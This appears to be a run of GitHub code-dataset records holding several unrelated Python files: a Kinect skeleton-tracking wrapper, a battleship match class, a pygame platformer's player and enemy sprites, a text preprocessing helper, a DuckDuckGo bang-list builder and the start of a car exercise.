c_api.OniVideoMode(pixelFormat=c_api.OniPixelFormat.ONI_PIXEL_FORMAT_RGB888,\n resolutionX=FRAME_WIDTH, resolutionY=FRAME_HEIGHT, fps=FRAME_RATE))\n self._color_stream.start()\n\n def read_color_frame(self):\n if self._color_stream is not None:\n try:\n raw_frame = self._color_stream.read_frame()\n self._color_frame = np.array(raw_frame.get_buffer_as_triplet()).reshape([FRAME_HEIGHT, FRAME_WIDTH, 3])\n return True, self._color_frame\n except (utils.OpenNIError, utils.NiteError, OSError):\n return False, None\n\n def read_depth_frame(self):\n if self._depth_stream is not None:\n try:\n raw_data = self._depth_stream.read_frame().get_buffer_as_uint16()\n raw_frame = np.ndarray((FRAME_HEIGHT, FRAME_WIDTH), dtype=np.uint16, buffer=raw_data)\n self._depth_frame = ((raw_frame + 1024) / 256).astype('uint8')\n self.skeleton_available = self.update_skeletons()\n return True, self._depth_frame\n except (utils.OpenNIError, utils.NiteError, OSError):\n return False, None\n\n def update_skeletons(self) -> bool:\n skeleton_frame = self._user_tracker.read_frame()\n if skeleton_frame.users:\n user = skeleton_frame.users[0]\n if user.is_new():\n self._user_tracker.start_skeleton_tracking(user.id)\n elif user.skeleton.state == nite2.SkeletonState.NITE_SKELETON_TRACKED and user.is_visible():\n self._skeleton = user.skeleton\n return True\n return False\n\n def tilt_up(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle + 2 if current_angle < MAXIMUM_ELEVATION \\\n else current_angle\n\n def tilt_down(self):\n with self._screen_lock:\n current_angle = self.get_tilt_angle()\n self._motor.camera.elevation_angle = current_angle - 2 if current_angle > MINIMUM_ELEVATION \\\n else current_angle\n\n def get_tilt_angle(self):\n return self._motor.camera.get_elevation_angle()\n\n def close(self):\n if self._device is not None:\n if self._depth_stream is not None:\n self._depth_stream.stop()\n if self._color_stream is not None:\n self._color_stream.stop()\n if self._user_tracker is not None:\n self._user_tracker.close()\n if self._motor is not None:\n self._motor.close()\n nite2.unload()\n openni2.unload()\n self.is_opened = False\n\n def set_confidence_thres(self, thres: float):\n self.confidence_thres = thres\n\n def get_skeleton1(self) -> np.ndarray:\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n if self._skeleton is not None:\n for idx, joint in enumerate(self._skeleton.joints):\n ret[idx] = joint.position.x, joint.position.y, joint.position.z, joint.positionConfidence\n return ret\n\n def get_skeleton2(self):\n ret = np.zeros((self.joints_per_person, 4), dtype=np.float32)\n return ret\n","repo_name":"howieraem/KinectActionDetection","sub_path":"sensor/kinect.py","file_name":"kinect.py","file_ext":"py","file_size_in_byte":9236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2150336413","text":"from gameboard import GameBoard\nclass Match(GameBoard):\n\n def __init__(self, ship_owner, bomb_owner, board_size):\n #receive all data from the match\n self.board = GameBoard(board_size).set_up_board()\n self.ship_owner = ship_owner\n self.bomb_owner = bomb_owner\n\n self.ship_positions = ship_owner.board_positions\n self.bombs_positions = bomb_owner.bomb_position\n self.plot_ship()\n\n def plot_ship(self):\n #plot ship into the board\n for ship_position in self.ship_positions:\n for position in ship_position:\n ship_row = position[0]\n ship_column = position[1]\n row = int(ship_row)\n #chance de value of position to 1\n #try:\n self.board[row -1][ship_column] = 1\n #except IndexError:\n #return \" Position is not avaible\"\n #exit(1)\n def get_result(self):\n for bomb in self.bombs_positions:\n bomb_column = bomb[-1]\n bomb_row = int(bomb[:-1])\n if(self.board[bomb_row - 1][bomb_column] == 1):\n self.board[bomb_row - 1][bomb_column] = 2\n # print('The ship was hitted bomb :{}'.format(bomb))\n\n elif(self.board[bomb_row - 1][bomb_column] == 2):\n pass\n #\n print ('The positions alredy bombeb')\n else:\n print ('The ship was not hitted')\n\n def destroyed_ship(self):\n #plot ship into the board\n for ship_position in self.ship_positions:\n ship_state = []\n list = [0 , 1]\n for position in ship_position:\n ship_row = position[0]\n ship_column = position[1]\n row = int(ship_row)\n #chance de value of position to 1\n #try:\n state_of_ship = self.board[row -1][ship_column]\n ship_state.append(state_of_ship)\n\n if any(state_of in ship_state for state_of in list):\n print (\"ship survived\")\n else:\n print (\"ship {} defeated\".format(ship.name))\n #except IndexError:\n #return \" Position is not avaible\"\n #exit(1)\n","repo_name":"JulioCezar32/naval-war","sub_path":"sample/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30446026773","text":"from math import atan2, cos, floor, radians, sin\nfrom random import choice, randint\n\nfrom pygame.math import Vector2\nfrom pygame.rect import Rect\nfrom pygame.sprite import Group, Sprite\nfrom pygame.surface import Surface\nfrom pygame.time import get_ticks\nfrom pygame.transform import flip, smoothscale\n\nfrom .classes import Gold\nfrom .constants import GOLD, GRAVITY, GREEN, ORANGE, RED, TILE_SIZE\nfrom .functions import load_images\nfrom .guns import Handgun, Minigun, Shotgun\nfrom .texts import DamageText\n\n\nclass Player(Sprite):\n def __init__(self, position: tuple, images: tuple, selected_gun: str, enemies: Group, gold_group: Group, bullet_group: Group, texts: Group, upgrades: list, gold: int, health: int, max_health: int):\n super().__init__()\n\n self.animations = {\"idle\": [], \"run\": [], \"climb\": images[2], \"jump\": []}\n for image in images[0]:\n self.animations[\"idle\"].append(smoothscale(image, (image.get_width() * 1.5, image.get_height() * 1.5)))\n for image in images[1]:\n self.animations[\"run\"].append(smoothscale(image, (image.get_width() * 1.5, image.get_height() * 1.5)))\n self.animations[\"idle\"] = tuple(self.animations[\"idle\"])\n self.animations[\"run\"] = tuple(self.animations[\"run\"])\n self.animations[\"jump\"].append(smoothscale(images[3], (images[3].get_width() * 1.5, images[3].get_height() * 1.5)))\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.15, \"run\": 0.3, \"climb\": 0.2, \"jump\": 0.01}\n self.image = self.animations[self.action][self.frame_index]\n self.flip = False\n\n # collision rect\n self.rect = self.image.get_rect(midbottom=position)\n\n # movement stuff\n self.speed = 8\n self.vector = Vector2(0, 0) # direction of movement\n self.jump_speed = -18\n self.on_ground = True\n self.climbing = False\n\n # health stuff\n self.max_health = max_health\n self.health = health\n self.max_mana = 100\n self.mana = self.max_mana\n self.mana_regen = 0.1\n self.invincible = False\n self.invincibility_duration = 90 # frames\n self.debuffs = {\"burning\": 0, \"poison\": 0} # debuff name: amount of get_damage to get\n\n # pressed keys\n self.up = False\n self.down = False\n self.left = False\n self.right = False\n self.jump = False\n self.key_shoot = False\n self.key_special = False\n\n self.gold = gold\n\n # external groups\n self.enemies = enemies\n self.gold_group = gold_group\n self.bullet_group = bullet_group\n self.texts = texts\n\n # shooting\n if selected_gun == \"handgun\":\n self.gun = Handgun(self.bullet_group, self.vector)\n self.gun_images = load_images(\"data/img/guns/handgun\", \"handgun_\", 1.5, 1)\n elif selected_gun == \"shotgun\":\n self.gun = Shotgun(self.bullet_group, self.vector)\n self.gun_images = load_images(\"data/img/guns/shotgun\", \"shotgun_\", 1.5, 1)\n elif selected_gun == \"minigun\":\n self.gun = Minigun(self.bullet_group, self.vector)\n self.gun_images = load_images(\"data/img/guns/minigun\", \"minigun_\", 1.5, 1)\n\n # apply bought upgrades\n for upgrade in upgrades:\n if upgrade == \"BulletSpeedUp\":\n self.gun.cooldown = int(self.gun.cooldown * 0.8)\n elif upgrade == \"ManaRegen\":\n self.mana_regen += 0.05\n elif upgrade == \"ManaUp\":\n self.max_mana += 25\n self.mana += 25\n elif upgrade == \"SpeedUp\":\n self.speed += 1\n self.jump_speed -= 1\n elif upgrade == \"Strength\":\n self.gun.damage = (self.gun.damage[0] + 1, self.gun.damage[1] + 2)\n\n def get_damage(self, damage: int):\n self.health -= damage\n if self.debuffs[\"burning\"] > 0:\n color = ORANGE\n elif self.debuffs[\"poison\"] > 0:\n color = GREEN\n else:\n color = RED\n self.texts.add(DamageText((randint(self.rect.left, self.rect.right), randint(self.rect.top - 8, self.rect.top + 8)), str(damage), color))\n self.invincible = True\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def check_horizontal_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching right wall\n if self.vector.x < 0:\n self.rect.left = tile.rect.right\n return # finish looking for collisions\n # touching left wall\n elif self.vector.x > 0:\n self.rect.right = tile.rect.left\n return # finish looking for collisions\n\n def check_vertical_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching floor - stop falling, allow jump, stop climbing\n if self.vector.y > 0:\n self.vector.y = 0\n self.rect.bottom = tile.rect.top\n self.on_ground = True\n self.climbing = False\n return # finish looking for collisions\n # touching ceiling - start falling\n elif self.vector.y < 0:\n self.vector.y = 0\n self.rect.top = tile.rect.bottom\n return # finish looking for collisions\n\n # if player is in air and collision didn't happen, disable jump\n # without it, when falling from a block, you can jump in air\n if self.vector.y > 1:\n self.on_ground = False\n\n def check_ladder_collisions(self, ladders: set):\n ladder_collision = False\n \n for ladder in ladders:\n if self.rect.colliderect(ladder.rect):\n ladder_collision = True\n\n # center player on the ladder\n if self.climbing:\n self.vector.y = 0\n self.rect.centerx = ladder.rect.centerx - 4\n\n # go up\n if self.up:\n self.vector.y -= self.speed * 0.75\n if not self.climbing:\n self.climbing = True\n\n # go down\n if self.down:\n self.vector.y += self.speed * 0.75\n if not self.climbing:\n self.climbing = True\n\n # allow moving when on top of ladder\n if not ladder_collision:\n self.climbing = False\n\n def check_platform_collisions(self, platforms: set):\n collision_rect = Rect(self.rect.x, self.rect.bottom, self.rect.width, 8)\n # check 'feet' (collision_rect) colliding with platform\n for platform in platforms:\n if platform.rect.colliderect(collision_rect):\n # touching platform - stop falling, allow jump, stop climbing\n if self.vector.y > 0:\n self.vector.y = 0\n self.rect.bottom = platform.rect.top\n self.on_ground = True\n self.climbing = False\n\n # jump from the platform\n if self.down and self.jump:\n self.on_ground = False\n self.vector.y += 8.5\n\n break\n\n def check_lava_collisions(self, lava_tiles: set):\n for lava_tile in lava_tiles:\n if self.rect.colliderect(lava_tile.rect):\n # slow player while in lava, allow to \"swim\" (jmup)\n self.speed = 2\n self.jump_speed = -9\n self.vector.y *= 0.3\n self.on_ground = True\n\n if not self.invincible:\n # recieve damage from lava\n self.get_damage(randint(lava_tile.damage[0], lava_tile.damage[1]))\n # apply debuff\n self.debuffs[\"burning\"] = 3\n\n return\n\n # restore speed values if not in lava\n self.speed = 8\n self.jump_speed = -18\n\n def check_enemy_collisions(self):\n for enemy in self.enemies:\n if self.rect.colliderect(enemy.rect):\n damage = randint(enemy.damage[0], enemy.damage[1])\n self.get_damage(damage)\n if isinstance(enemy, SpiderAdvanced):\n if randint(0, 5) < 2:\n self.debuffs[\"poison\"] = 5\n break\n\n def check_coins_collisions(self):\n for gold in self.gold_group:\n if self.rect.colliderect(gold.rect):\n self.gold += gold.amount\n self.texts.add(DamageText(self.rect.midtop, f\"{gold.amount}$\", GOLD))\n gold.kill()\n return gold.amount * 10\n return\n\n def draw(self, screen: Surface, scroll: set):\n screen.blit(self.image, (self.rect.x - scroll[0], self.rect.y - scroll[1]))\n\n def update(self, screen: Surface, scroll: list, objects: dict):\n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(objects[\"collidable\"])\n \n # update y position and check for verical collisions\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(objects[\"collidable\"])\n\n # check for collisions with other objects (except enemies)\n self.check_ladder_collisions(objects[\"ladders\"])\n self.check_platform_collisions(objects[\"platforms\"])\n self.check_lava_collisions(objects[\"lava\"])\n score = self.check_coins_collisions()\n\n # update shoot cooldown\n if self.gun.cooldown > 0:\n self.gun.cooldown -= 1\n\n # regenerate mana\n if self.mana < self.max_mana:\n self.mana += self.mana_regen\n\n # shoot\n if self.key_shoot:\n self.gun.shoot(self.rect, self.flip, self.up, self.down)\n # special\n if self.key_special:\n self.mana = self.gun.special(self.rect, self.flip, self.mana, self.up, self.down)\n\n # move left\n if self.left:\n if not self.climbing:\n self.vector.x = -self.speed\n self.update_action(\"run\")\n self.flip = True\n # or move right\n elif self.right:\n if not self.climbing:\n self.vector.x = self.speed\n self.update_action(\"run\")\n self.flip = False\n # or stop moving\n else:\n self.vector.x = 0\n if not self.climbing:\n self.update_action(\"idle\")\n # jump (from ground or from ladder)\n if (self.jump and self.on_ground) or (self.jump and self.climbing):\n self.vector.y = self.jump_speed\n self.jump = False\n self.on_ground = False\n self.climbing = False\n\n # set max falling speed\n if self.vector.y > 18:\n self.vector.y = 18\n\n if not self.climbing and not self.on_ground:\n self.update_action(\"jump\")\n elif self.climbing:\n self.update_action(\"climb\")\n\n # check for collisions with enemies\n if not self.invincible:\n self.check_enemy_collisions()\n # get damage from debuffs\n if self.debuffs[\"burning\"] > 0:\n self.get_damage(2)\n self.debuffs[\"burning\"] -= 1\n if self.debuffs[\"poison\"] > 0:\n self.get_damage(1)\n self.debuffs[\"poison\"] -= 1\n\n # update invincivbility\n if self.invincible:\n self.invincibility_duration -= 1\n if self.invincibility_duration <= 0:\n self.invincibility_duration = 90\n self.invincible = False\n\n # change animation frame\n if not self.climbing or (self.climbing and self.up or self.down):\n self.frame_index += self.cooldowns[self.action]\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animations[self.action][floor(self.frame_index)], self.flip, False)\n\n # blinking if damaged\n if self.invincible:\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw player\n self.draw(screen, scroll)\n\n # draw gun\n if not self.climbing:\n if not self.on_ground:\n if self.up:\n offset_y = -16\n else:\n offset_y = -8\n else:\n offset_y = 0\n\n if not self.up and not self.down:\n if not self.flip:\n screen.blit(self.gun_images[0], (self.rect.x - scroll[0], self.rect.y - scroll[1] + offset_y))\n else:\n image = flip(self.gun_images[0], True, False)\n image_rect = image.get_rect(topright=(self.rect.right - scroll[0], self.rect.y - scroll[1] + offset_y))\n screen.blit(image, image_rect)\n elif self.up:\n if not self.flip:\n screen.blit(self.gun_images[1], (self.rect.x - scroll[0], self.rect.y - scroll[1] + offset_y))\n else:\n image = flip(self.gun_images[1], True, False)\n image_rect = image.get_rect(topright=(self.rect.right - scroll[0], self.rect.y - scroll[1] + offset_y))\n screen.blit(image, image_rect)\n elif self.down:\n if not self.flip:\n screen.blit(self.gun_images[2], (self.rect.x - scroll[0], self.rect.y - scroll[1] + offset_y))\n else:\n image = flip(self.gun_images[2], True, False)\n image_rect = image.get_rect(topright=(self.rect.right - scroll[0], self.rect.y - scroll[1] + offset_y))\n screen.blit(image, image_rect)\n\n return score\n\n\nclass EnemyBase(Sprite):\n def __init__(self, position: tuple, hp: int, damage: tuple, speed: tuple, gold: tuple, gold_group: Group):\n super().__init__()\n\n self.gold_group = gold_group\n\n # image and rect\n self.image = Surface((TILE_SIZE // 2, TILE_SIZE - 8))\n self.image.fill(RED)\n self.rect = self.image.get_rect(topleft=(position[0], position[1]))\n\n # health, damage, speed and gold amount from config file\n if isinstance(hp, tuple):\n self.health = randint(hp[0], hp[1])\n else:\n self.health = hp\n\n self.damage = tuple(damage)\n\n if isinstance(speed, tuple):\n self.speed = randint(speed[0], speed[1])\n else:\n self.speed = speed\n\n if isinstance(gold, tuple):\n self.gold_amount = randint(gold[0], gold[1])\n else:\n self.gold_amount = gold\n\n self.blinking = 0 # blinking time after damaged\n\n self.vector = Vector2(0, 0)\n\n # current status and idle time\n self.idling = False\n self.idling_counter = 0\n\n def get_damage(self, damage: int):\n self.health -= damage\n self.blinking = 30\n if self.health <= 0:\n if self.gold_amount > 0:\n self.gold_group.add(Gold((randint(self.rect.left, self.rect.right), self.rect.bottom), self.gold_amount))\n self.kill()\n return self.score_amount\n\n def draw(self, screen: Surface, scroll: list):\n screen.blit(self.image, (self.rect.x - scroll[0], self.rect.y - scroll[1]))\n\n def check_horizontal_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching right wall\n if self.vector.x < 0:\n self.rect.left = tile.rect.right\n self.vector.x *= -1\n break\n # touching left wall\n elif self.vector.x > 0:\n self.rect.right = tile.rect.left\n self.vector.x *= -1\n break\n\n def check_vertical_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching floor - stop falling\n self.rect.bottom = tile.rect.top\n self.vector.y = 0\n break\n\n\nclass Slime(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 10, (1, 3), (1, 3), (0, 2), gold_group)\n self.animation = images\n self.frame_index = 0\n self.animation_length = len(images)\n self.image = self.animation[self.frame_index]\n self.rect = Rect(position[0], position[1], 48, 48)\n self.flip = False\n\n self.score_amount = 30\n\n self.vector.x = self.speed * choice((-1, 1))\n\n def draw(self, screen: Surface, scroll: list):\n screen.blit(self.image, (self.rect.x - 8 - scroll[0], self.rect.y - 16 - scroll[1]))\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, constraints: Group):\n if self.vector.x > 0:\n self.flip = True\n elif self.vector.x < 0:\n self.flip = False\n # update animation frame\n self.frame_index += 0.2\n if self.frame_index >= self.animation_length:\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animation[floor(self.frame_index)], self.flip, False)\n\n if not self.idling:\n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n\n # random idle\n if randint(1, 200) == 1:\n self.idling = True\n self.idling_counter = randint(30, 70)\n else:\n self.idling_counter -= 1\n # after idle - stop idling, randomly select direction of moving\n if self.idling_counter <= 0:\n self.idling = False\n self.vector.x *= choice((-1, 1))\n\n # update y position and check collisions with tiles\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(set.union(tiles, platforms))\n\n # set max falling spedd - temp fix for bug with platform collision\n if self.vector.y > 18:\n self.vector.y = 18\n\n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n\n\nclass Spider(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 6, (1, 2), (5, 6), (0, 2), gold_group)\n\n self.animations = {\"idle\": images[0], \"run\": images[1]}\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.2, \"run\": 0.4}\n self.image = self.animations[self.action][self.frame_index]\n\n self.score_amount = 60\n\n self.vector.x = self.speed * choice((-1, 1))\n\n self.rect = self.image.get_rect(topleft=position)\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def check_constraints(self, constraints: set):\n for constraint in constraints:\n if self.rect.colliderect(constraint):\n self.vector.x *= -1\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, constraints: Group):\n if not self.idling:\n # random idle\n if randint(1, 50) == 1:\n self.idling = True\n self.update_action(\"idle\")\n self.idling_counter = randint(30, 70)\n \n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n self.check_constraints(constraints)\n else:\n self.idling_counter -= 1\n # after idle - stop idling, randomly select direction of moving\n if self.idling_counter <= 0:\n self.idling = False\n self.update_action(\"run\")\n self.vector.x *= choice((-1, 1))\n\n # update y position and check collisions with tiles\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(set.union(tiles, platforms))\n\n # set max falling spedd - temp fix for bug with platform collision\n if self.vector.y > 18:\n self.vector.y = 18\n\n # update animation frame\n self.frame_index += self.cooldowns[self.action]\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = self.animations[self.action][floor(self.frame_index)]\n\n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n\n\nclass SpiderAdvanced(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 6, (1, 2), (5, 6), (0, 2), gold_group)\n\n self.animations = {\"idle\": images[0], \"run\": images[1]}\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.2, \"run\": 0.4}\n self.image = self.animations[self.action][self.frame_index]\n self.flip = False\n\n self.score_amount = 120\n\n self.rect = self.image.get_rect(topleft=position)\n self.vision_rect = Rect(0, 0, 640, 240)\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def check_constraints(self, constraints: set):\n for constraint in constraints:\n if self.rect.colliderect(constraint):\n self.vector.x *= -1\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, contraints: Group):\n if not self.idling:\n # random idle\n if randint(1, 50) == 1:\n self.idling = True\n self.update_action(\"idle\")\n self.idling_counter = randint(30, 70)\n \n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n self.check_constraints(contraints)\n else:\n self.idling_counter -= 1\n # after idle - stop idling, randomly select direction of moving\n if self.idling_counter <= 0:\n self.idling = False\n self.update_action(\"run\")\n self.vector.x *= choice((-1, 1))\n\n # update y position and check collisions with tiles\n self.vector.y += GRAVITY\n self.rect.y += self.vector.y\n self.check_vertical_collisions(set.union(tiles, platforms))\n\n # set max falling spedd - temp fix for bug with platform collision\n if self.vector.y > 18:\n self.vector.y = 18\n\n # update enemy vision\n self.vision_rect.midbottom = self.rect.midbottom\n # if enemy \"sees\" the player\n if self.vision_rect.colliderect(player_rect):\n self.idling = False\n self.update_action(\"run\")\n # change enemy direction to go after the player\n if player_rect.x < self.rect.x - 5:\n self.vector.x = -self.speed\n elif player_rect.x > self.rect.x + 5:\n self.vector.x = self.speed\n else:\n self.vector.x = 0\n elif self.vector.x == 0:\n self.vector.x = self.speed * choice((-1, 1))\n # TEMP: enemy vision\n # draw_rect(screen, GOLD, (self.vision_rect.left - scroll[0], self.vision_rect.top - scroll[1], self.vision_rect.width, self.vision_rect.height))\n\n if self.vector.x < 0:\n self.flip = False\n elif self.vector.x > 0:\n self.flip = True\n # update animation frame\n self.frame_index += self.cooldowns[self.action]\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animations[self.action][floor(self.frame_index)], self.flip, False)\n\n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n\n\nclass Bat(EnemyBase):\n def __init__(self, position: tuple, images: tuple, gold_group: Group):\n super().__init__(position, 10, (1, 3), (4, 6), (0, 4), gold_group)\n\n self.animations = {\"idle\": images[0], \"fly\": images[1]}\n self.frame_index = 0\n self.action = \"idle\"\n self.cooldowns = {\"idle\": 0.01, \"fly\": 0.25}\n self.image = self.animations[self.action][self.frame_index]\n self.flip = False\n\n self.vision_rect = Rect(0, 0, 640, 360)\n self.spotted_player = False\n\n self.score_amount = 120\n\n self.move_count = 30\n\n def check_horizontal_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching tile right wall\n if self.vector.x < 0:\n self.rect.left = tile.rect.right\n if not self.spotted_player:\n random_angle = randint(-90, 90)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n # touching tile left wall\n elif self.vector.x > 0:\n self.rect.right = tile.rect.left\n if not self.spotted_player:\n random_angle = randint(90, 270)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n\n def check_vertical_collisions(self, tiles: set):\n for tile in tiles:\n if tile.rect.colliderect(self.rect):\n # touching floor\n if self.vector.y > 0:\n self.rect.bottom = tile.rect.top\n if not self.spotted_player:\n random_angle = randint(180, 360)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n # touching ceiling\n elif self.vector.y < 0:\n self.rect.top = tile.rect.bottom\n if not self.spotted_player:\n random_angle = randint(0, 180)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n break\n\n def get_damage(self, damage: int):\n self.update_action(\"fly\")\n self.health -= damage\n self.blinking = 30\n if self.health <= 0:\n if self.gold_amount > 0:\n self.gold_group.add(Gold((randint(self.rect.left, self.rect.right), self.rect.bottom), self.gold_amount))\n self.kill()\n return self.score_amount\n\n def update_action(self, new_action: str):\n if new_action != self.action:\n self.action = new_action\n self.frame_index = 0\n\n def update(self, screen: Surface, scroll: list, tiles: set, platforms: set, player_rect: Rect, constraints: Group):\n if self.action == \"fly\":\n if self.vector.x > 0:\n self.flip = True\n elif self.vector.x < 0:\n self.flip = False\n # update animation frame\n self.frame_index += 0.2\n if self.frame_index >= len(self.animations[self.action]):\n self.frame_index = 0\n # set new frame to the image and flip it if necessary\n self.image = flip(self.animations[self.action][floor(self.frame_index)], self.flip, False)\n\n if self.move_count == 0:\n random_angle = randint(1, 360)\n self.vector.x = round(self.speed * cos(radians(random_angle)))\n self.vector.y = round(self.speed * sin(radians(random_angle)))\n self.idling = True\n self.idling_counter = randint(30, 50)\n self.move_count = randint(30, 50)\n \n if self.idling:\n self.idling_counter -= 1\n if self.idling_counter <= 0:\n self.idling = False\n else:\n self.move_count -= 1 \n # update x position and check for horizontal collisions\n self.rect.x += self.vector.x\n self.check_horizontal_collisions(tiles)\n\n # update y position and check collisions with tiles\n self.rect.y += self.vector.y\n self.check_vertical_collisions(tiles)\n\n # update enemy vision\n self.vision_rect.center = self.rect.center\n # if enemy \"sees\" the player\n if self.vision_rect.colliderect(player_rect):\n self.update_action(\"fly\")\n self.idling = False\n self.spotted_player = True\n self.move_count = 10\n # change enemy direction to go after the player\n x_distance = player_rect.centerx - self.rect.centerx\n y_distance = player_rect.centery - self.rect.centery - 24\n angle = atan2(y_distance, x_distance)\n self.vector.x = round(self.speed * cos(angle))\n self.vector.y = round(self.speed * sin(angle))\n else:\n self.spotted_player = False\n \n # blinking if damaged\n if self.blinking:\n self.blinking -= 1\n if sin(get_ticks()) >= 0:\n self.image.set_alpha(255)\n else:\n self.image.set_alpha(63)\n else:\n self.image.set_alpha(255)\n\n # draw enemy on the screen\n self.draw(screen, scroll)\n","repo_name":"badzianga/mine-shot","sub_path":"data/modules/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":31636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22548447766","text":"import re\nimport nltk\n\nSTOPWORDS = open('resources/stopwords.txt').read().split('\\n')\n\ndef split_remove_punctuation(text):\n word_list = re.split('\\W+', text) # split into words, without punctuation\n while '' in word_list: # quick fix, regex adds empty string\n word_list.remove('') \n word_list = [word.lower() for word in word_list] # lower everything\n\n return word_list\n\ndef remove_stopwords(word_list, words_to_keep=[]):\n \"\"\"Doesn't remove the words in words_to_keep if they are present and they are indeed stopwords\"\"\"\n if words_to_keep and isinstance(words_to_keep, str):\n words_to_keep = split_remove_punctuation(words_to_keep)\n\n for w in STOPWORDS:\n if w not in words_to_keep:\n while w in word_list:\n # list.remove only removes an element one time\n word_list.remove(w)\n\n return word_list\n\ndef stem(word_list):\n p = nltk.stem.PorterStemmer()\n return [p.stem(word) for word in word_list]\n\ndef get_bigrams(word_list):\n return [(word_list[i], word_list[i+1]) for i in range(len(word_list)-1) if word_list[i] != word_list[i+1]]\n","repo_name":"jkafrouni/feedback_search","sub_path":"feedback_search/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"199578005","text":"import json\nimport yaml\nimport requests\n\n\ndef get_bang_dict(download=False):\n if download:\n url=\"https://duckduckgo.com/bang.js\"\n\n src_dict={}\n\n\n try:\n r = requests.get(url,timeout=5)\n r.raise_for_status()\n src_dict = json.loads(r.text)\n with open(\"bang.js\",\"w\") as f:\n f.write(r.text)\n\n except:\n src_dict=get_bang_dict(download=False)\n\n else:\n with open(\"bang.js\", \"r\") as f:\n src_dict = json.load(f)\n\n return src_dict\n\nbang_dict={}\nfor bang in get_bang_dict():\n bang_dict[bang['t']] = bang['u']\n\nwith open(\"patch.yaml\", \"r\") as f:\n patch = yaml.safe_load(f)\n\nfor bang in patch:\n bang_dict[bang] = patch[bang]\n\nwith open(\"bang_full.yaml\", \"w\") as f:\n yaml.safe_dump(bang_dict, f)\n\nwith open(\"bang_full.js\", \"w\") as f:\n f.write(\"const lookup = \")\n\nwith open(\"bang_full.js\", \"a\") as f:\n json.dump(bang_dict, f)\n\n","repo_name":"ouyen/bang_searh.js","sub_path":"dict/get_dict.py","file_name":"get_dict.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74342353154","text":"from car_program import Car\nfrom car_ui import UI\n\n# Next, design a program that creates a Car object then calls the accelerate method five times. \n# After each call to the accelerate method, get the current speed of the car and display it. 